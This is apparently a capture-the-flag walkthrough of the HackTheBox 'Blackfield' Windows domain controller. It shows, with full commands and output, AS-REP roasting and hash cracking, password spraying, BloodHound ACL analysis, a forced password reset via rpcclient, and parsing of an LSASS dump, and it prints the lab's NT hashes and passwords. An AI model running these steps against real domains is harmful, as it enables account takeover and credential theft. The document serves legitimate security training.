HTB - Blackfield


In this walkthrough we go through the Blackfield machine from HackTheBox. It is rated Hard on the platform and covers exploitation of Windows and Active Directory misconfigurations for initial access: AS-REP roasting, a ForceChangePassword ACL edge, and an LSASS memory dump left on a file share. For privilege escalation, Backup Operators group privileges are abused to reach SYSTEM. So, let's get started without further delay.


Machine Info:

Title: Blackfield
IP address: 10.10.10.192
Difficulty: Hard
OS: Windows
Description: Blackfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations.

Enumeration:

  • I started with my usual aggressive nmap scan (-A: version detection, default scripts, OS detection and traceroute) and found several open ports. The highlights: port 88 (Kerberos), which tells us we are dealing with an Active Directory domain controller, along with 139 and 445 (SMB), 389 and 3268 (LDAP and the Global Catalog) and 135/593 (MSRPC). Two details in the output matter later: SMB message signing is enabled and required, which rules out NTLM relay against this host, and the clock skew of almost seven hours, which breaks Kerberos authentication from our machine unless we sync our clock against the DC first. Note also that without -p- nmap only checks its top 1,000 ports, so a service such as WinRM on 5985/tcp would not show up here.

$ sudo nmap -A 10.10.10.192
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 11:11 IST

Nmap scan report for 10.10.10.192
Host is up (0.21s latency).
Not shown: 993 filtered ports
PORT     STATE SERVICE       VERSION
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-14 12:41:41Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-12-14T12:42:01
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   207.26 ms 10.10.14.1
2   208.09 ms 10.10.10.192

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.83 seconds

nmap scan

  • As per the nmap results, the domain name is BLACKFIELD.local, so I added it to my /etc/hosts file.

adding hostname

  • Tried to enumerate usernames over RPC (null session) and LDAP (anonymous bind), but neither returned anything useful.

RPC and LDAP user enumeration

  • Next, pivoted to SMB enumeration. Listing the shares turned up an interesting one: profiles$.

smbclient -L 10.10.10.192

SMB Enumeration

  • Peeked inside the profiles$ share: it holds one profile folder per user, which gives us a long list of potential usernames. Saved them on my local machine in a file called usernames.txt.

$ smbclient //10.10.10.192/profiles$
Password for [WORKGROUP\wh1terose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  3 22:17:12 2020
  ..                                  D        0  Wed Jun  3 22:17:12 2020
  AAlleni                             D        0  Wed Jun  3 22:17:11 2020
  ABarteski                           D        0  Wed Jun  3 22:17:11 2020
  ABekesz                             D        0  Wed Jun  3 22:17:11 2020
  ABenzies                            D        0  Wed Jun  3 22:17:11 2020
  ABiemiller                          D        0  Wed Jun  3 22:17:11 2020
  AChampken                           D        0  Wed Jun  3 22:17:11 2020
  ACheretei                           D        0  Wed Jun  3 22:17:11 2020
  ACsonaki                            D        0  Wed Jun  3 22:17:11 2020

-- snipped -- 

Enumerating profile share

$ cat usernames.txt 
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
AKlado
AKoffenburger
AKollolli
AKruppe
AKubale
ALamerz

 --- snipped --

usernames

Performing an AS-REP Roasting attack

  • With the harvested usernames, I tried AS-REP roasting: for any account with Kerberos pre-authentication disabled, the KDC answers an AS-REQ without proof of the password, and the encrypted part of that AS-REP is keyed with the user's own secret, so it can be cracked offline. Got a hit for support. The KDC_ERR_C_PRINCIPAL_UNKNOWN errors below are useful too: they confirm which names in the list are not valid domain accounts.

python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -usersfile usernames.txt -dc-ip 10.10.10.192 'BLACKFIELD.LOCAL/'

Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)

-- snipped --

$krb5asrep$23$support@BLACKFIELD.LOCAL:4a9e0763e700c5be596a5dd120f6962c$709b4e186f3a9b346052cc0f14286ba73dfc155327e9cea337bdcd0ef47f1fd54b13578d868209a171fc76c29220607db8182bbfdd1c479291578a21cc1ccf556f3f79c0cae6ce1951f765af242649261a87bf262e6b3e56ccc40e35a15f980d2469e968429c51a54e616d37e9fea4ed0430b38cb5e5c16c82151876029a816cdff290a0204f5348ce7c47dd6e3eeefead7839ed7cdd2f713bc56b1e086069e0475b7cb885582331c48e275c4a16145382a014306221f39dcf60ac071318ce6280452bf628288395f339d6c983469177547227464a44a9816ce4851310123453dde56b9c1e0aeeb8db9530586cad4614a6f5fca8


-- snipped --

AS-REP Roasting attack

  • Cracked the captured hash with hashcat (mode 18200, Kerberos 5 AS-REP etype 23) against rockyou and recovered the password for support: #00^BlackKnight.

hashcat -m 18200 hash.txt rockyou.txt -O

cracked password

  • Next, I validated the credential against the DC with crackmapexec, which reported it as valid (the green [+]).

crackmapexec smb 10.10.10.192 -u support -p '#00^BlackKnight'

crackmapexec creds spray

  • Tried to get a shell over WinRM with these credentials, but was unable to do so.

unable to get shell

  • I also sprayed the recovered password across the accounts in usernames.txt. Got a hit for AAlleni, but still could not get a shell with it. Before spraying in a real environment, check the lockout policy first (for example with crackmapexec's --pass-pol) so that one attempt per account stays well under the threshold.

crackmapexec smb 10.10.10.192 -u usernames.txt -p '#00^BlackKnight'

crackmapexec password spray

  • Next, checked which SMB shares support can reach. There is an interesting one called forensic, but this account has no access to it yet.

smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.192...
[+] IP: 10.10.10.192:445	Name: BLACKFIELD.local                                  
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	forensic                                          	NO ACCESS	Forensic / Audit share.

-- snipped -- 

SMB enum with creds

  • I also added the DC01.blackfield.local to my /etc/hosts file in order to avoid any host resolution issues later.

adding DC name

Enumeration with Bloodhound.py

  • I hit a dead end here for a while. Next, I ran bloodhound-python with the credentials we have and collected the domain data from the DC over LDAP. The "Kerberos auth to LDAP failed, trying NTLM" lines are the clock skew from the nmap scan showing up again; the collector falls back to NTLM, so the run still completes.

$ bloodhound-python -c all -u support -p '#00^BlackKnight' -d blackfield.local -gc blackfield.local -dc DC01.blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: DC01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts

-- snipped -- 

bloodhound python output

  • This produced a set of JSON files containing the collected domain data.

captured json files

  • Uploaded the files to BloodHound and looked at what the user support can do. Under Outbound Object Control, the First Degree Object Control query shows a ForceChangePassword edge from support to the user Audit2020: support can reset that account's password without knowing the current one, and so take the account over.

Analysis in Bloodhound

Outbound Object Control

ForceChangePassword Privilege
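The same question can be answered offline from the bloodhound-python JSON without the GUI, which is handy when you only want one node's edges. The following is an added example of my own (not part of the walkthrough and not BloodHound code). It assumes the v4 collector layout in which every object carries an ObjectIdentifier, Properties.name and an Aces list of {PrincipalSID, PrincipalType, RightName, IsInherited}; the RIDs 1104 and 1105 and the whole sample data set are constructed, the domain SID is the one visible in the LSASS dump later on this page.

```python
"""Added example, not from the walkthrough: 'First Degree Object Control'
straight from bloodhound-python's users.json / groups.json."""
import json

# Rights that BloodHound draws as control edges from the holder to the target.
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "Owns",
                  "AllExtendedRights", "ForceChangePassword", "AddMember", "AddSelf"}


def load_objects(*json_blobs):
    """Merge the 'data' arrays of the collector's users/groups/computers files."""
    objects = []
    for blob in json_blobs:
        objects.extend(json.loads(blob)["data"])
    return objects


def _sid_map(objects):
    return {o["ObjectIdentifier"]: o["Properties"]["name"] for o in objects}


def first_degree_control(objects, principal_name):
    """Outbound control held directly by principal_name: sorted (target, right) pairs.
    Group memberships are deliberately not followed; that is what 'first degree' means."""
    names = _sid_map(objects)
    sid = next((s for s, n in names.items() if n.upper() == principal_name.upper()), None)
    if sid is None:
        raise ValueError("unknown principal %s" % principal_name)
    return sorted((obj["Properties"]["name"], ace["RightName"])
                  for obj in objects for ace in obj.get("Aces", [])
                  if ace["PrincipalSID"] == sid and ace["RightName"] in CONTROL_RIGHTS)


def who_controls(objects, target_name):
    """Inbound view of the same data: who holds a control right over target_name."""
    names = _sid_map(objects)
    target = next(o for o in objects if o["Properties"]["name"].upper() == target_name.upper())
    return sorted((names.get(a["PrincipalSID"], a["PrincipalSID"]), a["RightName"])
                  for a in target.get("Aces", []) if a["RightName"] in CONTROL_RIGHTS)


# Constructed sample in the collector's layout. Domain SID from the LSASS dump
# on this page; RIDs 1104/1105 are made up, 512 is Domain Admins, 1413 is
# svc_backup's RID from the dump.
DOMAIN_SID = "S-1-5-21-4194615774-2175524697-3563712290"
USERS_JSON = json.dumps({"data": [
    {"ObjectIdentifier": DOMAIN_SID + "-1104",
     "Properties": {"name": "SUPPORT@BLACKFIELD.LOCAL"}, "Aces": []},
    {"ObjectIdentifier": DOMAIN_SID + "-1105",
     "Properties": {"name": "AUDIT2020@BLACKFIELD.LOCAL"},
     "Aces": [{"PrincipalSID": DOMAIN_SID + "-1104", "PrincipalType": "User",
               "RightName": "ForceChangePassword", "IsInherited": False},
              {"PrincipalSID": DOMAIN_SID + "-512", "PrincipalType": "Group",
               "RightName": "GenericAll", "IsInherited": True}]},
    {"ObjectIdentifier": DOMAIN_SID + "-1413",
     "Properties": {"name": "SVC_BACKUP@BLACKFIELD.LOCAL"},
     "Aces": [{"PrincipalSID": DOMAIN_SID + "-512", "PrincipalType": "Group",
               "RightName": "GenericAll", "IsInherited": True}]}],
    "meta": {"type": "users", "count": 3, "version": 4}})
GROUPS_JSON = json.dumps({"data": [
    {"ObjectIdentifier": DOMAIN_SID + "-512",
     "Properties": {"name": "DOMAIN ADMINS@BLACKFIELD.LOCAL"}, "Aces": []}],
    "meta": {"type": "groups", "count": 1, "version": 4}})

if __name__ == "__main__":
    objs = load_objects(USERS_JSON, GROUPS_JSON)
    print(first_degree_control(objs, "support@blackfield.local"))
    print(who_controls(objs, "audit2020@blackfield.local"))
```

With real collector output, pass the file contents of users.json, groups.json and computers.json to load_objects. The equivalent in the BloodHound UI is the node's Outbound Object Control count, or the raw query MATCH p=(u:User {name:"SUPPORT@BLACKFIELD.LOCAL"})-[:ForceChangePassword]->(t) RETURN p.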

Exploiting First Degree Object Control

  • Next, I used rpcclient to reset audit2020's password (setuserinfo2 with information level 23 sets a new password over SAMR) and verified the new credential against the DC with crackmapexec, which came back positive, so we are good to go. Keep in mind that this is a destructive change: the real user is locked out until their password is reset again, so on an engagement it needs explicit approval, and the new value has to satisfy the domain password policy or the call fails.

$ rpcclient -U 'blackfield.local/support%#00^BlackKnight' 10.10.10.192
rpcclient $> setuserinfo2 audit2020 23 Password123
rpcclient $> exit

RPCclient password change

crackmapexec creds spray

  • Now I checked the shares as audit2020 and was able to read the contents of the forensic share.

$ smbmap -H 10.10.10.192 -u audit2020 -p 'Password123'
[+] Finding open SMB ports....
[+] User SMB session established on 10.10.10.192...
[+] IP: 10.10.10.192:445	Name: blackfield.local                                  
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	.                                                  
	dr--r--r--                0 Sun Feb 23 20:40:16 2020	.
	dr--r--r--                0 Sun Feb 23 20:40:16 2020	..
	dr--r--r--                0 Sun Feb 23 23:44:37 2020	commands_output
	dr--r--r--                0 Fri May 29 01:59:24 2020	memory_analysis
	dr--r--r--                0 Sat Feb 29 04:00:34 2020	tools
	forensic                                          	READ ONLY	Forensic / Audit share.

SMB enum with new creds

  • Accessed the share with smbclient. It holds three folders: commands_output (the output of audit commands run on the DC), memory_analysis (zipped process memory dumps) and tools (forensic tooling). Downloaded the files that looked interesting to my local machine.

$ smbclient //10.10.10.192/forensic -U 'audit2020%Password123'
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Feb 23 18:33:16 2020
  ..                                  D        0  Sun Feb 23 18:33:16 2020
  commands_output                     D        0  Sun Feb 23 23:44:37 2020
  memory_analysis                     D        0  Fri May 29 01:58:33 2020
  tools                               D        0  Sun Feb 23 19:09:08 2020

		5102079 blocks of size 4096. 1691114 blocks available
smb: \> cd commands_ouput
cd \commands_ouput\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd commands_output
smb: \commands_output\> ls
  .                                   D        0  Sun Feb 23 23:44:37 2020
  ..                                  D        0  Sun Feb 23 23:44:37 2020
  domain_admins.txt                   A      528  Sun Feb 23 18:30:19 2020
  domain_groups.txt                   A      962  Sun Feb 23 18:21:52 2020
  domain_users.txt                    A    16454  Sat Feb 29 04:02:17 2020
  firewall_rules.txt                  A   518202  Sun Feb 23 18:23:58 2020
  ipconfig.txt                        A     1782  Sun Feb 23 18:20:28 2020
  netstat.txt                         A     3842  Sun Feb 23 18:21:01 2020
  route.txt                           A     3976  Sun Feb 23 18:23:01 2020
  systeminfo.txt                      A     4550  Sun Feb 23 18:26:59 2020
  tasklist.txt                        A     9990  Sun Feb 23 18:24:29 2020

		5102079 blocks of size 4096. 1691114 blocks available
smb: \commands_output\> cd ..
smb: \> cd memory_analysis
smb: \memory_analysis\> ls
  .                                   D        0  Fri May 29 01:58:33 2020
  ..                                  D        0  Fri May 29 01:58:33 2020
  conhost.zip                         A 37876530  Fri May 29 01:55:36 2020
  ctfmon.zip                          A 24962333  Fri May 29 01:55:45 2020
  dfsrs.zip                           A 23993305  Fri May 29 01:55:54 2020
  dllhost.zip                         A 18366396  Fri May 29 01:56:04 2020
  ismserv.zip                         A  8810157  Fri May 29 01:56:13 2020
  lsass.zip                           A 41936098  Fri May 29 01:55:08 2020
  mmc.zip                             A 64288607  Fri May 29 01:55:25 2020
  RuntimeBroker.zip                   A 13332174  Fri May 29 01:56:24 2020
  ServerManager.zip                   A 131983313  Fri May 29 01:56:49 2020
  sihost.zip                          A 33141744  Fri May 29 01:57:00 2020
  smartscreen.zip                     A 33756344  Fri May 29 01:57:11 2020
  svchost.zip                         A 14408833  Fri May 29 01:57:19 2020
  taskhostw.zip                       A 34631412  Fri May 29 01:57:30 2020
  winlogon.zip                        A 14255089  Fri May 29 01:57:38 2020
  wlms.zip                            A  4067425  Fri May 29 01:57:44 2020
  WmiPrvSE.zip                        A 18303252  Fri May 29 01:57:53 2020

		5102079 blocks of size 4096. 1691114 blocks available
smb: \memory_analysis\> cd ..
smb: \> cd tools
smb: \tools\> ls
  .                                   D        0  Sun Feb 23 19:09:08 2020
  ..                                  D        0  Sun Feb 23 19:09:08 2020
  sleuthkit-4.8.0-win32               D        0  Sun Feb 23 19:09:03 2020
  sysinternals                        D        0  Sun Feb 23 19:05:25 2020
  volatility                          D        0  Sun Feb 23 19:05:39 2020

		5102079 blocks of size 4096. 1691114 blocks available

Accessing forensics share

tools found

smb: \commands_output\> prompt off
smb: \commands_output\> recurse on
smb: \commands_output\> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
getting file \commands_output\domain_groups.txt of size 962 as domain_groups.txt (1.1 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \commands_output\domain_users.txt of size 16454 as domain_users.txt (18.9 KiloBytes/sec) (average 6.9 KiloBytes/sec)
getting file \commands_output\firewall_rules.txt of size 518202 as firewall_rules.txt (292.3 KiloBytes/sec) (average 122.5 KiloBytes/sec)
getting file \commands_output\ipconfig.txt of size 1782 as ipconfig.txt (2.1 KiloBytes/sec) (average 102.7 KiloBytes/sec)
getting file \commands_output\netstat.txt of size 3842 as netstat.txt (4.4 KiloBytes/sec) (average 88.8 KiloBytes/sec)
getting file \commands_output\route.txt of size 3976 as route.txt (4.5 KiloBytes/sec) (average 78.1 KiloBytes/sec)
getting file \commands_output\systeminfo.txt of size 4550 as systeminfo.txt (5.3 KiloBytes/sec) (average 70.2 KiloBytes/sec)
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (11.4 KiloBytes/sec) (average 64.3 KiloBytes/sec)

downloading everything


  • Looked into one of the more interesting files, domain_admins.txt, and found that a user named Ipwn3dYourCompany is also a Domain Admin.

domain_admins.txt

  • The next interesting file was lsass.zip. It caught my eye because the LSASS process keeps credential material (NT hashes, Kerberos keys and sometimes plaintext passwords) for every logged-on session, so a memory dump of it is as good as dumping it live. After unzipping, found lsass.DMP, a minidump of the LSASS process.

unzip lsass.zip


  • Used pypykatz to parse the dump and found, among other things, the NTLM hashes of svc_backup and Administrator, plus the DC01$ machine account secret.

$ pypykatz lsa minidump lsass.DMP 
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: svc_backup
		Domain: BLACKFIELD.LOCAL
	== WDIGEST [633ba]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 365835 (5950b)
session_id 2
username UMFD-2
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:59:38.218491+00:00
sid S-1-5-96-0-2
luid 365835
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5950b]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5950b]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 365493 (593b5)
session_id 2
username UMFD-2
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:59:38.200147+00:00
sid S-1-5-96-0-2
luid 365493
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [593b5]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [593b5]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 257142 (3ec76)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:59:13.318909+00:00
sid S-1-5-18
luid 257142
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
	== MSV ==
		Username: Administrator
		Domain: BLACKFIELD
		LM: NA
		NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
		SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
		DPAPI: 240339f898b6ac4ce3f34702e4a89550
	== WDIGEST [25869]==
		username Administrator
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: Administrator
		Domain: BLACKFIELD.LOCAL
	== WDIGEST [25869]==
		username Administrator
		domainname BLACKFIELD
		password None
		password (hex)
	== DPAPI [25869]==
		luid 153705
		key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
		masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
		sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9

== LogonSession ==
authentication_id 137110 (21796)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:58:27.068590+00:00
sid S-1-5-18
luid 137110
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 134695 (20e27)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:58:26.678019+00:00
sid S-1-5-18
luid 134695
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.LOCAL

== LogonSession ==
authentication_id 40310 (9d76)
session_id 1
username DWM-1
domainname Window Manager
logon_server 
logon_time 2020-02-23T17:57:46.897202+00:00
sid S-1-5-90-0-1
luid 40310
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [9d76]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [9d76]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 40232 (9d28)
session_id 1
username DWM-1
domainname Window Manager
logon_server 
logon_time 2020-02-23T17:57:46.897202+00:00
sid S-1-5-90-0-1
luid 40232
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [9d28]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [9d28]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 996 (3e4)
session_id 0
username DC01$
domainname BLACKFIELD
logon_server 
logon_time 2020-02-23T17:57:46.725846+00:00
sid S-1-5-20
luid 996
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [3e4]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: dc01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [3e4]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 24410 (5f5a)
session_id 1
username UMFD-1
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:57:46.569111+00:00
sid S-1-5-96-0-1
luid 24410
	== MSV ==
		Username: DC01$
		Domain: BLACKFIELD
		LM: NA
		NT: b624dc83a27cc29da11d9bf25efea796
		SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
		DPAPI: NA
	== WDIGEST [5f5a]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: DC01$
		Domain: BLACKFIELD.local
		Password: &SYVE+<ynu`Ql;gvEE!f$DoO0F+,gP@P`fra`z4&G3K'mH:&'K^SW$FNWWx7J-N$^'bzB1Duc3^Ez]En kh`b'YSV7Ml#@G3@*(b$]j%#L^[Q`nCP'<Vb0I6
		password (hex)260053005900560045002b003c0079006e007500600051006c003b00670076004500450021006600240044006f004f00300046002b002c006700500040005000600066007200610060007a0034002600470033004b0027006d0048003a00260027004b005e0053005700240046004e0057005700780037004a002d004e0024005e00270062007a004200310044007500630033005e0045007a005d0045006e0020006b00680060006200270059005300560037004d006c00230040004700330040002a002800620024005d006a00250023004c005e005b00510060006e004300500027003c0056006200300049003600
	== WDIGEST [5f5a]==
		username DC01$
		domainname BLACKFIELD
		password None
		password (hex)

== LogonSession ==
authentication_id 406499 (633e3)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406499
	== MSV ==
		Username: svc_backup
		Domain: BLACKFIELD
		LM: NA
		NT: 9658d1d1dcd9250115e2205d9f48400d
		SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
		DPAPI: a03cd8e9d30171f3cfe8caad92fef621
	== WDIGEST [633e3]==
		username svc_backup
		domainname BLACKFIELD
		password None
		password (hex)
	== Kerberos ==
		Username: svc_backup
